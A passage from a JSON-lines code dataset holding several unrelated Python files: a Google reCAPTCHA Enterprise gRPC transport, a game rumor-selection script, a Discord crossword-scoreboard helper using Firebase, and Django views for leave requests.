Callable[[], Tuple[bytes, bytes]] = None\n ) -> None:\n \"\"\"Instantiate the transport.\n\n Args:\n host (Optional[str]): The hostname to connect to.\n credentials (Optional[google.auth.credentials.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify the application to the service; if none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n This argument is ignored if ``channel`` is provided.\n channel (Optional[grpc.Channel]): A ``Channel`` instance through\n which to make calls.\n api_mtls_endpoint (Optional[str]): The mutual TLS endpoint. If\n provided, it overrides the ``host`` argument and tries to create\n a mutual TLS channel with client SSL credentials from\n ``client_cert_source`` or applicatin default SSL credentials.\n client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]): A\n callback to provide client SSL certificate bytes and private key\n bytes, both in PEM format. 
+{"seq_id":"113167889","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom typing import Callable, Dict, Tuple\n\nfrom google.api_core import grpc_helpers  # type: ignore\nfrom google.auth import credentials  # type: ignore\nfrom google.auth.transport.grpc import SslCredentials  # type: ignore\n\n\nimport grpc  # type: ignore\n\nfrom google.cloud.recaptchaenterprise_v1.types import recaptchaenterprise\nfrom google.protobuf import empty_pb2 as empty  # type: ignore\n\nfrom .base import RecaptchaEnterpriseServiceTransport\n\n\nclass RecaptchaEnterpriseServiceGrpcTransport(RecaptchaEnterpriseServiceTransport):\n    \"\"\"gRPC backend transport for RecaptchaEnterpriseService.\n\n    Service to determine the likelihood an event is legitimate.\n\n    This class defines the same methods as the primary client, so the\n    primary client can load the underlying transport implementation\n    and call it.\n\n    It sends protocol buffers over the wire using gRPC (which is built on\n    top of HTTP/2); the ``grpcio`` package must be installed.\n    \"\"\"\n\n    def __init__(\n        self,\n        *,\n        host: str = \"recaptchaenterprise.googleapis.com\",\n        credentials: credentials.Credentials = None,\n        channel: grpc.Channel = None,\n        api_mtls_endpoint: str = None,\n        client_cert_source: Callable[[], Tuple[bytes, bytes]] = None\n    ) -> None:\n        \"\"\"Instantiate the transport.\n\n        Args:\n            host (Optional[str]): The hostname to connect to.\n            credentials (Optional[google.auth.credentials.Credentials]): The\n                authorization credentials to attach to requests. These\n                credentials identify the application to the service; if none\n                are specified, the client will attempt to ascertain the\n                credentials from the environment.\n                This argument is ignored if ``channel`` is provided.\n            channel (Optional[grpc.Channel]): A ``Channel`` instance through\n                which to make calls.\n            api_mtls_endpoint (Optional[str]): The mutual TLS endpoint. If\n                provided, it overrides the ``host`` argument and tries to create\n                a mutual TLS channel with client SSL credentials from\n                ``client_cert_source`` or application default SSL credentials.\n            client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]): A\n                callback to provide client SSL certificate bytes and private key\n                bytes, both in PEM format. It is ignored if ``api_mtls_endpoint``\n                is None.\n\n        Raises:\n          google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport\n              creation failed for any reason.\n        \"\"\"\n        if channel:\n            # Sanity check: Ensure that channel and credentials are not both\n            # provided.\n            credentials = False\n\n            # If a channel was explicitly provided, set it.\n            self._grpc_channel = channel\n        elif api_mtls_endpoint:\n            host = (\n                api_mtls_endpoint\n                if \":\" in api_mtls_endpoint\n                else api_mtls_endpoint + \":443\"\n            )\n\n            # Create SSL credentials with client_cert_source or application\n            # default SSL credentials.\n            if client_cert_source:\n                cert, key = client_cert_source()\n                ssl_credentials = grpc.ssl_channel_credentials(\n                    certificate_chain=cert, private_key=key\n                )\n            else:\n                ssl_credentials = SslCredentials().ssl_credentials\n\n            # create a new channel. The provided one is ignored.\n            self._grpc_channel = grpc_helpers.create_channel(\n                host,\n                credentials=credentials,\n                ssl_credentials=ssl_credentials,\n                scopes=self.AUTH_SCOPES,\n            )\n\n        # Run the base constructor.\n        super().__init__(host=host, credentials=credentials)\n        self._stubs = {}  # type: Dict[str, Callable]\n\n    @classmethod\n    def create_channel(\n        cls,\n        host: str = \"recaptchaenterprise.googleapis.com\",\n        credentials: credentials.Credentials = None,\n        **kwargs\n    ) -> grpc.Channel:\n        \"\"\"Create and return a gRPC channel object.\n        Args:\n            host (Optional[str]): The host for the channel to use.\n            credentials (Optional[~.Credentials]): The\n                authorization credentials to attach to requests. These\n                credentials identify this application to the service. If\n                none are specified, the client will attempt to ascertain\n                the credentials from the environment.\n            kwargs (Optional[dict]): Keyword arguments, which are passed to the\n                channel creation.\n        Returns:\n            grpc.Channel: A gRPC channel object.\n        \"\"\"\n        return grpc_helpers.create_channel(\n            host, credentials=credentials, scopes=cls.AUTH_SCOPES, **kwargs\n        )\n\n    @property\n    def grpc_channel(self) -> grpc.Channel:\n        \"\"\"Create the channel designed to connect to this service.\n\n        This property caches on the instance; repeated calls return\n        the same channel.\n        \"\"\"\n        # Sanity check: Only create a new channel if we do not already\n        # have one.\n        if not hasattr(self, \"_grpc_channel\"):\n            self._grpc_channel = self.create_channel(\n                self._host, credentials=self._credentials\n            )\n\n        # Return the channel from cache.\n        return self._grpc_channel\n\n    @property\n    def create_assessment(\n        self\n    ) -> Callable[\n        [recaptchaenterprise.CreateAssessmentRequest], recaptchaenterprise.Assessment\n    ]:\n        r\"\"\"Return a callable for the create assessment method over gRPC.\n\n        Creates an Assessment of the likelihood an event is\n        legitimate.\n\n        Returns:\n            Callable[[~.CreateAssessmentRequest],\n                ~.Assessment]:\n                A function that, when called, will call the underlying RPC\n                on the server.\n        \"\"\"\n        # Generate a \"stub function\" on-the-fly which will actually make\n        # the request.\n        # gRPC handles serialization and deserialization, so we just need\n        # to pass in the functions for each.\n        if \"create_assessment\" not in self._stubs:\n            self._stubs[\"create_assessment\"] = self.grpc_channel.unary_unary(\n                \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/CreateAssessment\",\n                request_serializer=recaptchaenterprise.CreateAssessmentRequest.serialize,\n                response_deserializer=recaptchaenterprise.Assessment.deserialize,\n            )\n        return self._stubs[\"create_assessment\"]\n\n    @property\n    def annotate_assessment(\n        self\n    
) -> Callable[\n        [recaptchaenterprise.AnnotateAssessmentRequest],\n        recaptchaenterprise.AnnotateAssessmentResponse,\n    ]:\n        r\"\"\"Return a callable for the annotate assessment method over gRPC.\n\n        Annotates a previously created Assessment to provide\n        additional information on whether the event turned out\n        to be authentic or fraudulent.\n\n        Returns:\n            Callable[[~.AnnotateAssessmentRequest],\n                ~.AnnotateAssessmentResponse]:\n                A function that, when called, will call the underlying RPC\n                on the server.\n        \"\"\"\n        # Generate a \"stub function\" on-the-fly which will actually make\n        # the request.\n        # gRPC handles serialization and deserialization, so we just need\n        # to pass in the functions for each.\n        if \"annotate_assessment\" not in self._stubs:\n            self._stubs[\"annotate_assessment\"] = self.grpc_channel.unary_unary(\n                \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/AnnotateAssessment\",\n                request_serializer=recaptchaenterprise.AnnotateAssessmentRequest.serialize,\n                response_deserializer=recaptchaenterprise.AnnotateAssessmentResponse.deserialize,\n            )\n        return self._stubs[\"annotate_assessment\"]\n\n    @property\n    def create_key(\n        self\n    ) -> Callable[[recaptchaenterprise.CreateKeyRequest], recaptchaenterprise.Key]:\n        r\"\"\"Return a callable for the create key method over gRPC.\n\n        Creates a new reCAPTCHA Enterprise key.\n\n        Returns:\n            Callable[[~.CreateKeyRequest],\n                ~.Key]:\n                A function that, when called, will call the underlying RPC\n                on the server.\n        \"\"\"\n        # Generate a \"stub function\" on-the-fly which will actually make\n        # the request.\n        # gRPC handles serialization and deserialization, so we just need\n        # to pass in the functions for each.\n        if \"create_key\" not in self._stubs:\n            self._stubs[\"create_key\"] = self.grpc_channel.unary_unary(\n                \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/CreateKey\",\n                request_serializer=recaptchaenterprise.CreateKeyRequest.serialize,\n                response_deserializer=recaptchaenterprise.Key.deserialize,\n            )\n        return self._stubs[\"create_key\"]\n\n    @property\n    def list_keys(\n        self\n    ) -> Callable[\n        [recaptchaenterprise.ListKeysRequest], recaptchaenterprise.ListKeysResponse\n    ]:\n        r\"\"\"Return a callable for the list keys method over gRPC.\n\n        Returns the list of all keys that belong to a\n        project.\n\n        Returns:\n            Callable[[~.ListKeysRequest],\n                ~.ListKeysResponse]:\n                A function that, when called, will call the underlying RPC\n                on the server.\n        \"\"\"\n        # Generate a \"stub function\" on-the-fly which will actually make\n        # the request.\n        # gRPC handles serialization and deserialization, so we just need\n        # to pass in the functions for each.\n        if \"list_keys\" not in self._stubs:\n            self._stubs[\"list_keys\"] = self.grpc_channel.unary_unary(\n                \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/ListKeys\",\n                request_serializer=recaptchaenterprise.ListKeysRequest.serialize,\n                response_deserializer=recaptchaenterprise.ListKeysResponse.deserialize,\n            )\n        return self._stubs[\"list_keys\"]\n\n    @property\n    def get_key(\n        self\n    ) -> Callable[[recaptchaenterprise.GetKeyRequest], recaptchaenterprise.Key]:\n        r\"\"\"Return a callable for the get key method over gRPC.\n\n        Returns the specified key.\n\n        Returns:\n            Callable[[~.GetKeyRequest],\n                ~.Key]:\n                A function that, when called, will call the underlying RPC\n                on the server.\n        \"\"\"\n        # Generate a \"stub function\" on-the-fly which will actually make\n        # the request.\n        # gRPC handles serialization and deserialization, so we just need\n        # to pass in the functions 
for each.\n if \"get_key\" not in self._stubs:\n self._stubs[\"get_key\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/GetKey\",\n request_serializer=recaptchaenterprise.GetKeyRequest.serialize,\n response_deserializer=recaptchaenterprise.Key.deserialize,\n )\n return self._stubs[\"get_key\"]\n\n @property\n def update_key(\n self\n ) -> Callable[[recaptchaenterprise.UpdateKeyRequest], recaptchaenterprise.Key]:\n r\"\"\"Return a callable for the update key method over gRPC.\n\n Updates the specified key.\n\n Returns:\n Callable[[~.UpdateKeyRequest],\n ~.Key]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"update_key\" not in self._stubs:\n self._stubs[\"update_key\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/UpdateKey\",\n request_serializer=recaptchaenterprise.UpdateKeyRequest.serialize,\n response_deserializer=recaptchaenterprise.Key.deserialize,\n )\n return self._stubs[\"update_key\"]\n\n @property\n def delete_key(\n self\n ) -> Callable[[recaptchaenterprise.DeleteKeyRequest], empty.Empty]:\n r\"\"\"Return a callable for the delete key method over gRPC.\n\n Deletes the specified key.\n\n Returns:\n Callable[[~.DeleteKeyRequest],\n ~.Empty]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"delete_key\" not in self._stubs:\n self._stubs[\"delete_key\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/DeleteKey\",\n request_serializer=recaptchaenterprise.DeleteKeyRequest.serialize,\n response_deserializer=empty.Empty.FromString,\n )\n return self._stubs[\"delete_key\"]\n\n\n__all__ = (\"RecaptchaEnterpriseServiceGrpcTransport\",)\n","sub_path":"google/cloud/recaptchaenterprise_v1/services/recaptcha_enterprise_service/transports/grpc.py","file_name":"grpc.py","file_ext":"py","file_size_in_byte":14222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"51712880","text":"\n# this function returns the message line (0, 10, 20, etc) of a\n# rumor to be told to the PC in question, or -1 if no rumor is\n# available\n\ndef find_rumor( pc, npc ):\n\tsk_mod = pc.skill_level_get(npc, skill_gather_information) + pc.stat_level_get(stat_level_bard)\n\tif (( game.story_state != game.global_vars[22] ) and ( game.story_state <= 6 )):\n\t\tgame.global_vars[22] = game.story_state\n\t\tgame.global_flags[211] = 0\n\t\tgame.global_flags[212] = 0\n\t\tgame.global_flags[213] = 0\n\t\tgame.global_flags[214] = 0\n\t\tgame.global_flags[215] = 0\n\t\tgame.global_flags[216] = 0\n\t\tgame.global_flags[217] = 0\n\t\tgame.global_flags[218] = 0\n\t\tgame.global_flags[219] = 0\n\t\tgame.global_flags[220] = 0\n\t\tgame.global_flags[221] = 0\n\t\tgame.global_flags[222] = 0\n\t\tgame.global_flags[223] = 0\n\t\tgame.global_flags[224] = 0\n\t\tgame.global_flags[225] = 0\n\t\tgame.global_flags[226] = 0\n\t\tgame.global_flags[209] = 0\n\t\tgame.global_flags[210] = 0\n\tif game.story_state == 0:\n\t\tif sk_mod == 5:\n\t\t\tsk_mod = 4\n\t\telif 
sk_mod >= 6:\n\t\t\tsk_mod = 5\n\telif game.story_state == 1:\n\t\tif (sk_mod == 2):\n\t\t\tsk_mod = 1\n\t\telif (sk_mod == 3) or (sk_mod == 4):\n\t\t\tsk_mod = 2\n\t\telif (sk_mod == 5):\n\t\t\tsk_mod = 3\n\t\telif (sk_mod == 6) or (sk_mod == 7):\n\t\t\tsk_mod = 4\n\t\telif (sk_mod >= 8):\n\t\t\tsk_mod = 5\n\telif game.story_state == 2:\n\t\tif (sk_mod == 2) or (sk_mod == 3):\n\t\t\tsk_mod = 1\n\t\telif (sk_mod == 4) or (sk_mod == 5):\n\t\t\tsk_mod = 2\n\t\telif (sk_mod == 6):\n\t\t\tsk_mod = 3\n\t\telif (sk_mod == 7) or (sk_mod == 8):\n\t\t\tsk_mod = 4\n\t\telif (sk_mod >= 9):\n\t\t\tsk_mod = 5\t\n\telif game.story_state == 3:\n\t\tif (sk_mod >= 1) and (sk_mod <= 4):\n\t\t\tsk_mod = 1\n\t\telif (sk_mod == 5) or (sk_mod == 6):\n\t\t\tsk_mod = 2\n\t\telif (sk_mod == 7):\n\t\t\tsk_mod = 3\n\t\telif (sk_mod == 8) or (sk_mod == 9):\n\t\t\tsk_mod = 4\n\t\telif (sk_mod >= 10):\n\t\t\tsk_mod = 5\t\n\telif game.story_state == 4:\n\t\tif (sk_mod >= 1) and (sk_mod <= 5):\n\t\t\tsk_mod = 1\n\t\telif (sk_mod == 6):\n\t\t\tsk_mod = 2\n\t\telif (sk_mod == 7):\n\t\t\tsk_mod = 3\n\t\telif (sk_mod >= 8) and (sk_mod <= 10):\n\t\t\tsk_mod = 4\n\t\telif (sk_mod >= 11):\n\t\t\tsk_mod = 5\t\n\telif game.story_state == 5:\n\t\tif (sk_mod >= 1) and (sk_mod <= 5):\n\t\t\tsk_mod = 1\n\t\telif (sk_mod == 6) or (sk_mod == 7):\n\t\t\tsk_mod = 2\n\t\telif (sk_mod == 8) or (sk_mod == 9):\n\t\t\tsk_mod = 3\n\t\telif (sk_mod >= 10) and (sk_mod <= 12):\n\t\t\tsk_mod = 4\n\t\telif (sk_mod >= 13):\n\t\t\tsk_mod = 5\t\n\telif game.story_state >= 6:\n\t\tif (sk_mod >= 1) and (sk_mod <= 5):\n\t\t\tsk_mod = 1\n\t\telif (sk_mod >= 6) and (sk_mod <= 10):\n\t\t\tsk_mod = 2\n\t\telif (sk_mod >= 11) and (sk_mod <= 14):\n\t\t\tsk_mod = 3\n\t\telif (sk_mod >= 15) and (sk_mod <= 17):\n\t\t\tsk_mod = 4\n\t\telif (sk_mod >= 18):\n\t\t\tsk_mod = 5\t\t\n\tss_num = (game.story_state) * 200\n\tsk_num = (sk_mod * 30) + 20\n\twhile ( sk_num >= 0 ):\n\t\trumor = ss_num + sk_num\n\t\tif rumor_valid( rumor, pc, npc ) == 1:\n\t\t\treturn rumor\n\t\telse:\n\t\t\tsk_num = ( sk_num - 10 )\n\treturn -1\n\ndef rumor_valid( rumor, pc, npc ):\n\toffset = (game.story_state) * 200\n\tsk_lookup = ( (rumor - offset)//10 )\t# floor division: the result is used as an integer flag index\n\tif game.global_flags[209+sk_lookup] == 1:\n\t\treturn 0\n\tif (npc.map == 5007):\n\t\tif ((rumor == 120) or (rumor == 130) or (rumor == 520) or (rumor == 530)):\n\t\t\treturn 0\n\telif ((rumor == 150) or (rumor == 330) or (rumor == 510) or (rumor == 540) or (rumor == 560)):\n\t\treturn 0\n\tif ((game.party_alignment == CHAOTIC_EVIL or game.party_alignment == NEUTRAL_EVIL) and (rumor == 550 or rumor == 630)):\n\t\treturn 0\n\tif (game.quests[12].state == qs_completed and rumor == 40):\n\t\treturn 0\n\tif ( pc.stat_level_get(stat_race) != race_human ) and (rumor == 800):\n\t\treturn 0\n\tif ((rumor >= 590 and rumor <= 680) or (rumor >=800 and rumor <= 830) and (npc.area == 1)):\n\t\treturn 1\n\tif ((rumor == 860 or rumor == 890 or rumor == 900 or rumor == 1030 or rumor == 1060 or rumor == 1090 or rumor == 1230 or rumor == 1260 or rumor == 1290) and (npc.area == 1 or npc.area == 3)):\n\t\treturn 1\n\tif ( rumor >= 690 and npc.area == 1 ):\n\t\treturn 0\n\tif (rumor >= 800 and npc.area == 3 ):\n\t\treturn 0\n\treturn 1\n\ndef rumor_given_out( rumor ):\n\toffset = (game.story_state) * 200\n\tsk_lookup = ( (rumor - offset)//10 )\t# floor division, as above\n\tgame.global_flags[209+sk_lookup] = 
1\n\treturn\n\n\n\t","sub_path":"scr/rumor_control.py","file_name":"rumor_control.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"209468797","text":"import datetime\nfrom firebase_config import ibaelia_db\nfrom dateutil.parser import parse\nimport discord\n\n\ndef get_scores_by_id(user_id, guild, limit=10):\n all_scores = ibaelia_db.child(\"scores\").order_by_child(\"time\").get().val()\n if all_scores is None:\n return []\n list_scores = [score for score in list(all_scores.values()) if score[\"user_id\"] == user_id][\n ::-1][:limit]\n return list_scores\n\n\ndef get_scores_by_time(time, guild):\n final_scores = []\n all_scores = ibaelia_db.child(\"scores\").order_by_child(\"score\").get().val()\n if all_scores is None:\n return []\n list_scores = [score for score in list(all_scores.values()) if\n score['time'].split(\" \")[0] == time]\n for score in list_scores:\n user = ibaelia_db.child(\"users\").order_by_child(\"id\").equal_to(score[\"user_id\"]).get().val()\n user_vals = list(user.values())[0]\n if guild in user_vals['guilds']:\n final_scores.append(score)\n return final_scores\n\n\ndef check_date(time):\n correctDate = None\n try:\n year, month, day = map(int, time.split(\"-\"))\n newDate = datetime.datetime(year, month, day)\n correctDate = True\n except ValueError:\n correctDate = False\n return correctDate\n\n\ndef get_current_week(time):\n today = parse(time)\n today_date = today.weekday()\n week_array = [(today + datetime.timedelta(days=i)).date() for i in\n range(-1 - today_date, 6 - today_date)]\n named_days_array = [day.strftime('%A') for day in week_array]\n week_dict = dict(zip(named_days_array, week_array))\n print(week_dict)\n return week_array\n\n\ndef push_score(user_id, username, score, time, guild):\n # get users\n # check time\n # if user not in users list, create new user\n # add to scores\n ids = add_user_to_database(user_id, username, guild)\n add_to_server(user_id, guild, ids)\n\n valid, prev_score = is_valid_score(user_id, username, score, time, guild)\n if valid:\n new_score = {\n \"user_id\": user_id,\n \"name\": username,\n \"score\": score,\n \"time\": time,\n \"guild\": guild\n }\n ibaelia_db.child(\"scores\").push(new_score)\n return [valid, prev_score]\n\n\ndef add_user_to_database(user_id, username, guild):\n all_users = ibaelia_db.child(\"users\").get()\n all_users_vals = all_users.val()\n ids = []\n if all_users_vals:\n for user in all_users.each():\n ids.append(user.val()['id'])\n if user_id not in ids:\n new_user = {\n \"id\": user_id,\n \"name\": username,\n \"guilds\": [guild]\n }\n ibaelia_db.child(\"users\").push(new_user)\n return ids\n\n\ndef add_to_server(user_id, guild, ids):\n if user_id in ids:\n curr_user = ibaelia_db.child(\"users\").order_by_child(\"id\").equal_to(user_id).get()\n curr_user_vals = list(curr_user.val().values())[0]\n curr_user_key = curr_user.each()[0].key()\n if guild not in curr_user_vals['guilds']:\n guilds = curr_user_vals['guilds']\n guilds.append(guild)\n ibaelia_db.child(\"users\").child(curr_user_key).update({'guilds': guilds})\n\n\ndef is_valid_score(user_id, username, score, time, guild):\n all_scores = ibaelia_db.child(\"scores\").order_by_child(\"time\").get().val()\n if all_scores is None:\n return [True, None]\n list_scores = [score for score in list(all_scores.values()) if score[\"user_id\"] == user_id]\n for score in list_scores:\n if score['time'].split(\" \")[0] == time.split(\" \")[0]:\n return [False, 
score['score']]\n return [True, None]\n\n\ndef format_scoreboard_embed(embed, scores):\n digits = {4: \"four\", 5: \"five\", 6: \"six\", 7: \"seven\", 8: \"eight\", 9: \"nine\"}\n\n # I don't know if creating the discord.File object is necessary to get the icon url?\n crossword_icon = \"crossword_images//crossword_icon.jpg\"\n discord.File(crossword_icon, filename=\"image.jpg\")\n embed = embed.set_thumbnail(url=\"attachment://image.jpg\")\n\n # The first field will be the current leader shout out\n current_leader_name = \"---------------:small_blue_diamond: CURRENT LEADER :small_blue_diamond:---------------\"\n current_leader_value = \"\\n\"\n leader = scores[0][\"name\"].split(\"#\")[0]\n # Compute the number of tabs to offset the name by based on name length\n name_length = len(leader)\n num_tabs = round((42 - (name_length + 2)) / 4.)\n current_leader_value += \"```ini\\n>\\u009b\" * num_tabs\n current_leader_value += f\"[{leader}]\\u009b\\u009b\\u009b\\u009b\\u009b<```\"\n # Add bottom border\n current_leader_value += \"\\n\" + (\"=\" * 42)\n embed.add_field(name=current_leader_name, value=current_leader_value, inline=False)\n\n # Add blank field for spacing\n embed.add_field(name=\"\\u200b\", value=\"\\u200b\", inline=False)\n\n # First place gets a special trophy as well\n time = f\"```fix\\n{scores[0]['score']}```\\n\"\n embed.add_field(name=f\":first_place: \\u009b{scores[0]['name']}\", value=time,\n inline=True)\n embed.add_field(name=\"\\u200b \\u200b \\u200b :trophy:\", value=\"\\u200b\", inline=True)\n\n for idx in range(len(scores)):\n if idx == 0:\n # Already did first place\n continue\n elif idx == 1:\n placement = \":second_place:\"\n time = f\"```python\\n{scores[idx]['score']}```\\n\"\n elif idx == 2:\n placement = \":third_place:\"\n time = f\"```python\\n{scores[idx]['score']}```\\n\"\n elif idx < 9:\n placement = f\":{digits[idx + 1]}:\"\n time = f\"```{scores[idx]['score']}```\\n\"\n else:\n placement = f\"{idx + 1}.\"\n time = f\"```{scores[idx]['score']}```\\n\"\n\n # We use inline to shorten the code block width\n embed.add_field(name=f\"{placement} \\u009b{scores[idx]['name']}\", value=time,\n inline=True)\n # Add blank field for second column\n embed.add_field(name=\"\\u200b\", value=\"\\u200b\", inline=True)\n\n embed.timestamp = datetime.datetime.now()\n embed = embed.set_footer(text=f\"uwu wowow {leader} senpai is so sugoiiii\")\n\n # Footer image\n crossword_icon = \"ibaelia_images//wow_irelia.jpg\"\n discord.File(crossword_icon, filename=\"image.jpg\")\n embed = embed.set_image(url=\"attachment://image.jpg\")\n\n return embed\n","sub_path":"cogs/helper_files/crossword_cog_helper.py","file_name":"crossword_cog_helper.py","file_ext":"py","file_size_in_byte":6367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"591835629","text":"from django.db.models import *\nfrom django.db.models import Expression\nfrom django.http import HttpResponse,HttpRequest,HttpResponseRedirect,request\nfrom django.shortcuts import render\nfrom .form import Aprove_Reject_form,Leave_request_form\nfrom django.urls import reverse\nfrom app1.models import Leave_Requests\nfrom datetime import datetime, timedelta\nfrom datetime import date\nfrom django.shortcuts import get_object_or_404\nfrom django.http import JsonResponse\nimport json\nimport uuid\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom itertools 
import chain\nfrom django import template\nfrom django.contrib.auth.models import Group\nfrom django.utils.timezone import now\nfrom datetime import timedelta as tdelta\nfrom django.utils import timezone\nfrom django.core import serializers\nimport time\nfrom decimal import Decimal\nfrom django.db.models.functions import ExtractMonth\n\n\n\n\n###########################################################################################\n\n\n\n\n#############################################################################################\n\ndef index(request):\n return HttpResponse(\"

    here you are Osama

    \")\n\n\n\n\n# =======================================\n# =======================================\n# =======================================\n# =======================================\n# ==========================================\n# ****************************************=======================================\n# =======================================\n# =======================================\n# =======================================\n# ==========================================\n# ****************************************=======================================\n# =======================================\n# =======================================\n# =======================================\n# ==========================================\n# ****************************************=======================================\n# =======================================\n# =======================================\n@login_required\ndef addition_Forbidden(request):\n return render(request, \"addition_Forbidden.html\", {})\n# =======================================\n\n@login_required\ndef success(request):\n return render(request,\"success.html\", {}) \n# ==========================================\n@login_required\ndef main(request):\n if request.user.groups.filter(name='employees') :\n return HttpResponseRedirect(reverse('main1'))\n elif request.user.groups.filter(name='managers'):\n return HttpResponseRedirect(reverse('main2'))\n# ****************************************\n\nregister = template.Library()\n#loggedadmin = request.user\n@register.filter(name='has_group')\n\ndef has_group(user, group_name):\n group = Group.objects.get(name=group_name)\n return True if group in user.groups.all() else False\n #----------------------------------------------------------\n@login_required\ndef Request_to_Leave_V(request):\n\n form = Leave_request_form((request.POST or None))\n title2 = \"\"\n if form.is_valid():\n request.session['form-submitted'] = True\n instance = form.save(commit=False)\n instance.employee_name = request.user.get_full_name()\n if has_group(request.user,\"Finance\"):\n instance.department_name=\"Finance\"\n elif has_group(request.user,\"IT\"): \n instance.department_name=\"IT\"\n elif has_group(request.user,\"Investment\"): \n instance.department_name=\"Investment\" \n instance.time_to_leave=datetime.now()\n instance.save()\n return HttpResponseRedirect(reverse('success'))\n\n\n context = { \"form\": form,}\n return render(request, \"Admision.html\", context)\n\n#--------------------------------------------------\n@login_required\ndef main1(request):\n return render(request, \"index.html\", {})\n#----------------------------------------------------\n@login_required\ndef main2(request):\n return render(request, \"index2.html\", {}) \n#-----------------------------------------------------------\n@login_required\ndef H_req_for_managers(request,id=None):\n today = str(date.today())\n if has_group(request.user,\"IT\"):\n requests = Leave_Requests.objects.all().filter(department_name='IT').order_by('time_to_leave')\n elif has_group(request.user,\"Investment\"):\n requests = cartridges.objects.all().filter(department_name='Investment').order_by('time_to_leave')\n elif has_group(request.user,\"Finance\"):\n requests = cartridges.objects.all().filter(department_name='Finance').order_by('time_to_leave')\n \n return render(request, \"H_req_for_managers.html\", { \"requests\":requests,})\n\n#----------------------------------------------------------------------\n@login_required\ndef 
def H_req_for_employees(request,id=None):\n    requests = Leave_Requests.objects.all().filter(employee_name=request.user.get_full_name()).order_by('time_to_leave')\n    return render(request, \"H_req_for_employees.html\", { \"requests\":requests,}) \n#----------------------------------------------------------------------\n@login_required\ndef Today_req_for_employees(request,id=None):\n    today = str(date.today())\n    requests = Leave_Requests.objects.all().filter(employee_name=request.user.get_full_name()).filter(time_to_leave=today).order_by('id')\n    return render(request, \"Today_req_for_employees.html\", { \"requests\":requests,}) \n#--------------------------------------\n@login_required\ndef Today_req_for_managers(request,id=None):\n    today = str(date.today())\n    if has_group(request.user,\"IT\"):\n        requests = Leave_Requests.objects.all().filter(department_name='IT').filter(time_to_leave=today).order_by('time_to_leave')\n    elif has_group(request.user,\"Investment\"):\n        requests = Leave_Requests.objects.all().filter(department_name='Investment').filter(time_to_leave=today).order_by('time_to_leave')\n    elif has_group(request.user,\"Finance\"): \n        requests = Leave_Requests.objects.all().filter(department_name='Finance').filter(time_to_leave=today).order_by('time_to_leave')\n\n    return render(request, \"Today_req_for_managers.html\", { \"requests\":requests,}) \n#======================================================================================\n# \n# \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n@login_required\ndef Approve(request,id=None):\n    Request = get_object_or_404(Leave_Requests,id=id) \n    if Request.request_revised == True:\n        return HttpResponseRedirect(reverse('addition_Forbidden')) \n    else:\n        Request.request_status = True\n        Request.request_revised = True \n        Request.save()\n        return HttpResponseRedirect(reverse('success')) \n\n#----------------------------------------------------------------------------\n@login_required\ndef Reject(request,id=None):\n    Request = get_object_or_404(Leave_Requests,id=id) \n    if Request.request_revised == True:\n        return HttpResponseRedirect(reverse('addition_Forbidden')) \n    else:\n        Request.request_status = False\n        Request.request_revised = True \n        Request.save()\n        return HttpResponseRedirect(reverse('success')) \n    ","sub_path":"app1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
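Each manager view in the record above repeats the same `has_group` if/elif ladder to pick a department-filtered queryset. A possible shared helper, sketched under the assumption of the record's `Leave_Requests` model; the `DEPARTMENTS` tuple and the function name are illustrative, not code from the record:

```python
from app1.models import Leave_Requests

DEPARTMENTS = ("IT", "Investment", "Finance")  # assumed group names

def requests_for_manager(user, on_date=None):
    """Leave requests for the first department group the user belongs to."""
    for dept in DEPARTMENTS:
        if user.groups.filter(name=dept).exists():
            qs = Leave_Requests.objects.filter(department_name=dept)
            if on_date is not None:
                qs = qs.filter(time_to_leave=on_date)  # e.g. today's requests
            return qs.order_by("time_to_leave")
    return Leave_Requests.objects.none()
```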
